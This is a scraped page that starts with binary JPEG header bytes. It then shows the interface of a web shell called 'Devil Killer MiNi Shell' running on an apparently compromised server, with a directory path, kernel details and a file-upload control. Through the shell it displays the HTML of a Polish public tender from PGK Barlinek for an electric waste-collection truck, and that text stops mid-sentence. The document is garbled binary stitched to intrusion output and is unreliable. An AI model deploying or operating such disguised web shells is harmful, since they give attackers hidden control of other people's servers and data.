JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250121/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250121/0005316701-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa fabrycznie nowego samochodu osobowo – ciężarowego o napędzie elektrycznym kat. N2 przystosowanym do odbierania selektywnych odpadów (śmieci) wraz z dwustanowiskową stacją ładowania. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 210014755</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szpitalna 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Barlinek</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">74-320</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL427 - Szczecinecko-pyrzycki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">957462311</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@pgkbarlinek.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pgkbarlinek.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o. </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa fabrycznie nowego samochodu osobowo – ciężarowego o napędzie elektrycznym kat. N2 przystosowanym do odbierania selektywnych odpadów (śmieci) wraz z dwustanowiskową stacją ładowania. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-60215bf4-82d9-440f-b8b8-8b75f9e6cef6</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00053167</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-01-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-60215bf4-82d9-440f-b8b8-8b75f9e6cef6 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl, adres poczty elektronicznej: biuro@pgkbarlinek.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">12.1.3. Wykonawca zamierzający<br/>wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto »Wykonawca« na Platformie e-<br/>Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-<br/>Zamówienia określa »Regulamin Platformy e-Zamówienia«, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz<br/>informacje zamieszczone w zakładce »Centrum Pomocy«.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ogólnego rozporządzenia o ochronie danych osobowych z dnia 27<br/>kwietnia 2016 r. (RODO) (Dz. Urz. UE L 119 z 04.05.2016) informujemy:<br/>17.1.1. Administratorem Państwa danych osobowych jest Przedsiębiorstwo Gospodarki Komunalnej Sp. z o. o. w Barlinku, ul.<br/>Szpitalna 4, 74-320 Barlinek, biuro@pgkbarlinek.pl<br/>Jeśli mają Państwo pytania dotyczące sposobu i zakresu przetwarzania danych osobowych możecie Państwo skontaktować się z<br/>Inspektorem Ochrony Danych, kontakt listowny na adres Administratora lub email: iod@itmediagroup.pl<br/>17.1.3. Administrator przetwarza Państwa dane osobowe na podstawie ustawy z dnia 11 września 2019 r. – Prawo zamówień<br/>publicznych (Pzp), zgodnie z art. 6 ust. 1 lit. c) RODO.<br/>Państwa dane osobowe przetwarzane są w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.: Dostawa<br/>fabrycznie nowego samochodu osobowo-ciężarowego o napędzie elektrycznym kat. N2 przystosowanym do odbierania<br/>selektywnych odpadów (śmieci) wraz z dwustanowiskową stacją ładowania’’ prowadzonym w trybie podstawowym ;<br/>W związku z przetwarzaniem danych osobowych w celu, o których mowa powyżej odbiorcami Państwa danych osobowych mogą być<br/>osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 Pzp, podmioty, które<br/>na podstawie zawartych umów przetwarzają dane osobowe w imieniu Administratora oraz podmioty uprawnione do uzyskiwania<br/>danych osobowych na podstawie przepisów prawa.<br/>Państwa dane osobowe będą przechowywane, zgodnie z art. 78 Pzp, przez okres 4 lat od dnia zakończenia postępowania o<br/>udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; a<br/>po tym czasie przez okres oraz w zakresie wymaganym przez przepisy obowiązującego prawa tj. zgodne z kategoriami<br/>archiwalnymi, o których mowa w rozporządzeniu Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie instrukcji<br/>kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych.<br/>W związku z przetwarzaniem danych osobowych przysługują Państwu następujące uprawnienia: prawo dostępu, w tym prawo do<br/>uzyskania kopii; prawo do żądania poprawiania, sprostowania; prawo do żądania ograniczenia przetwarzania danych osobowych w<br/>przypadkach przewidzianych prawem, zaś nie przysługuje Państwu prawo do żądania usunięcia danych osobowych, prawo do<br/>przenoszenia danych, prawo sprzeciwu wobec przetwarzania danych.<br/>17.1.8. W przypadku powzięcia informacji o niezgodnym z prawem przetwarzaniu danych osobowych, przysługuje Państwu prawo<br/>wniesienia skargi do organu nadzorczego właściwego w sprawach ochrony danych osobowych tj. Prezesa Urzędu Ochrony Danych<br/>Osobowych.<br/>17.1.9. Podanie przez Państwa danych osobowych jest wymogiem ustawowym określonym w przepisach Pzp, związanym z<br/>udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>przepisów Pzp.<br/>17.1.10. Państwa dane osobowe nie będą podlegać profilowaniu oraz automatycznemu podejmowaniu decyzji, nie będą<br/>przekazywane do państwa trzeciego, ani udostępniane organizacjom międzynarodowym.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych Wykonawców, którzy wykonają<br/>usługi lub dostawy do realizacji których te zdolności są wymagane. W przypadku, o którym mowa w pkt 6.1.4 SWZ, Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi lub/i dostawy<br/>wykonają poszczególni wykonawcy – Załącznik nr 8 do SWZ<br/>Wykonawcy, o których mowa w 8.1. SWZ ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo<br/>reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Zaleca się, aby Pełnomocnikiem był<br/>jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">03/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1.1. Dostawę fabrycznie nowego (rok produkcji min. 2024) specjalistycznego samochodu osobowo – ciężarowego o<br/>napędzie elektrycznym przystosowanego do odbioru i transportu selektywnych odpadów komunalnych (dalej zwanego<br/>pojazdem), , jak również spełniającego wymagania techniczne określone w obowiązujących w Polsce przepisach dla<br/>pojazdów poruszających się po drogach publicznych, w tym warunki techniczne określone w ustawie z dnia 20 czerwca<br/>1997 r. Prawo o ruchu drogowym (tj. Dz.U. z 2024 r. poz. 834 ze zm.) i rozporządzeniach wykonawczych do tej ustawy wraz<br/>z dwustanowiskową stacją ładowania. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34144900-7 - Pojazdy elektryczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34144510-6 - Pojazdy do transportu odpadów</p> <p class="mb-0">31156000-4 - Przestojowe źródła energii</p> <p class="mb-0">34144511-3 - Pojazdy do zbierania odpadów</p> <p class="mb-0">31158000-8 - Ładowarki</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">10.2.1. Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria oceny ofert:<br/>a) Cena netto – waga kryterium 90%,<br/>b) Termin dostawy – waga kryterium 10%.<br/>10.2.2. Zasady oceny kryterium &#34;Cena netto&#34; (CN)<br/>W przypadku kryterium &#34;Cena netto&#34; oferta otrzyma zaokrągloną do dwóch miejsc po przecinku ilość punktów wynikającą z działania:<br/>Cena najtańszej oferty [PLN]<br/>CN = X 90<br/>Cena badanej oferty [PLN]<br/>gdzie:<br/>CN - ilość punktów jakie otrzyma badana oferta za kryterium &#34;Cena netto&#34;<br/>Maksymalna ilość punktów jaką może otrzymać oferta za kryterium &#34;Cena netto&#34; - 90 pkt. (waga kryterium - 90%).<br/>10.2.3. Zasady oceny kryterium &#34;Termin dostawy&#34; (TD)<br/>W przypadku kryterium &#34;Termin dostawy&#34; odnosi się do terminu dostawy przedmiotu zamówienia od dnia podpisania umowy z<br/>uwzględnieniem terminu ostatecznego wykonania dostawy przedmiotu zamówienia o którym mowa w pkt. 4.1 SWZ.<br/>Zamawiający przydzieli punkty w kryterium termin dostawy zgodnie z opisem poniżej:<br/>Dostawa w terminie od dnia podpisania umowy:<br/>􀀀 60 dni – 10 pkt<br/>􀀀 90 dni – 9 pkt<br/>􀀀 Powyżej 90 dni - 8 pkt<br/>Uwaga!<br/>Wykonawca który w formularzu ofertowym nie zaoferuje terminu dostawy zgodnie z pkt. 4.1 SWZ lub nie określi skrócenie terminu<br/>dostawy względem rozdziału pkt. 4.1 SWZ zostanie odrzucona jako niezgodna z treścią SWZ.<br/>Maksymalna ilość punktów jaką może otrzymać oferta za kryterium &#34;Termin dostawy&#34; - 10 pkt. (waga kryterium - 10%).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1 O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 112 ust. 1<br/>ustawy Pzp dotyczące:<br/>6.1.1. zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie przewiduje warunków udziału w postępowaniu w tym zakresie.<br/>6.1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych<br/>przepisów<br/>Zamawiający nie przewiduje warunków udziału w postępowaniu w tym zakresie.<br/>6.1.3. sytuacji ekonomicznej lub finansowej<br/>Zamawiający uzna ten warunek za spełniony o ile Wykonawca złoży oświadczenie, że znajduje się w sytuacji ekonomicznej<br/>i finansowej zapewniającej wykonanie zamówienia.<br/>6.1.4. zdolności technicznej lub zawodowej<br/>W odniesieniu do warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej (art. 112 ust. 2 pkt. 4<br/>Pzp) Zamawiający wymaga, aby Wykonawca spełniał minimalne warunki umożliwiające realizację zamówienia na<br/>odpowiednim poziomie jakości, poprzez wykazanie, że w okresie ostatnich trzech lat przed upływem terminu składania ofert,<br/>a jeśli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał lub wykonuje należycie dostawę co najmniej<br/>jednego fabrycznie nowego samochodu osobowo – ciężarowego o napędzie elektrycznym kat. N2 przystosowanym do<br/>odbierania selektywnych odpadów (śmieci) wraz z dwustanowiskową stacją ładowania. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">7.7. Zamawiający wzywa<br/>Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia<br/>wezwania, podmiotowych środków dowodowych aktualnych na dzień składania, chyba że Zamawiający jest w posiadaniu lub ma<br/>dostęp do tych podmiotowych środków dowodowych, tj.<br/>7.7.1. W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia<br/>publicznego, zwanego dalej „postępowaniem”, zamawiający żąda następujących podmiotowych środków dowodowych:<br/>a) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tj. Dz.U. z 2023 r. poz. 1689 ze zm.),<br/>z innym Wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej<br/>grupy kapitałowej (wzór – załącznik nr 5 do SWZ);<br/>b) oświadczenia o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie<br/>podstaw wykluczenia z postępowania wskazanych przez Zamawiającego (według wzoru stanowiącego załącznik nr 2c do SWZ), o<br/>których mowa w:<br/>• art. 108 ust. 1 pkt 3 ustawy Pzp,<br/>• art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>zapobiegawczego,<br/>• art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie<br/>konkurencji,<br/>• art. 108 ust. 1 pkt 6 ustawy Pzp,<br/>a) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4) ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji,<br/>Ogłoszenie nr 2025/BZP 00010996/01 z dnia 2025-01-07<br/>2025-01-07 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>7.7.2. W celu potwierdzenia spełniania warunków udziału w postępowaniu określonych w pkt 6.1. SWZ:<br/>a) wykaz dostaw – co najmniej jednego pojazdu fabrycznie nowego specjalistycznego samochodu osobowo-ciężarowego o napędzie<br/>elektrycznym kat. N2 przystosowanym do odbierania selektywnych odpadów (śmieci) wraz z dwustanowiskową stacją ładowania, a<br/>w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania<br/>ofert, a jeżeli okres prowadzenia jest działalności jest krótszy - w tym okresie, wraz z podaniem przedmiotu, dat wykonania i<br/>podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane należycie z załączeniem dowodów określających, czy<br/>zostały wykonane w sposób należyty. Dowodami tymi są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz<br/>którego były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o<br/>obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku<br/>świadczeń okresowych lub ciągłych nadal wykonywanych, referencje bądź inne dokumenty potwierdzające ich należyte wykonanie<br/>powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, z wykorzystaniem wzoru – załącznik nr 4<br/>do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca, wraz z ofertą składaną w odpowiedzi na ogłoszenie o zamówieniu, dołącza do oferty oświadczenie o niepodleganiu<br/>wykluczeniu i spełnianiu warunków udziału w postępowaniu, w zakresie wskazanym przez Zamawiającego. Przedmiotowe<br/>oświadczenie może zostać złożone wg wzoru stanowiącego załącznik nr 2a i 2b do SWZ.<br/>7.2. Oświadczenie, o którym mowa w pkt 7.1., stanowi dowód potwierdzający brak podstaw wykluczenia i spełnianie warunków<br/>udziału w postępowaniu, odpowiednio na dzień składania wniosków o dopuszczenie do udziału w postępowaniu albo ofert, stanowi<br/>dowód tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 7.11.1. Zamawiający żąda wskazania przez Wykonawcę w jego ofercie zgodnie z załącznikiem nr 1 do SWZ danych<br/>dotyczących oferowanego przedmiotu zamówienia tj. markę oferowanego samochodu, typ, model i rok produkcji oraz markę<br/>oferowanej zabudowy, typ, model i rok produkcji.<br/>7.11.2. Zamawiający żąda, by Wykonawca złożył wraz z ofertą następujący środek dowodowy: dane techniczne<br/>oferowanego samochodu osobowo-ciężarowego i zabudowy w postaci kart katalogowych lub innego dokumentu. Załączone<br/>dokumenty muszą zawierać nazwę i producenta oferowanego pojazdu i zabudowy, wyposażenia oraz szczegóły techniczne<br/>i charakterystykę pozwalającą zweryfikować czy oferowany pojazd z zabudową spełnia wymagania Zmawiającego tzn. jest<br/>zgodny z opisem przedmiotu zamówienia. Dokumenty muszą być złożone w języku polskim. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 7.11.3. Jeżeli Wykonawca nie przedłoży wraz z ofertą ww. przedmiotowych środków dowodowych lub przedłożone środki<br/>dowodowe będą niekompletne Zamawiający przewiduje wezwanie Wykonawcy do jego złożenia lub uzupełniania na<br/>podstawie art. 107 ust. 2 ustawy Pzp <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 11.1. Zawartość oferty:<br/>11.1.1. Wypełniony formularz OFERTA, zgodnie z treścią Załącznika nr 1 do SWZ;<br/>11.1.2. Dokument potwierdzający 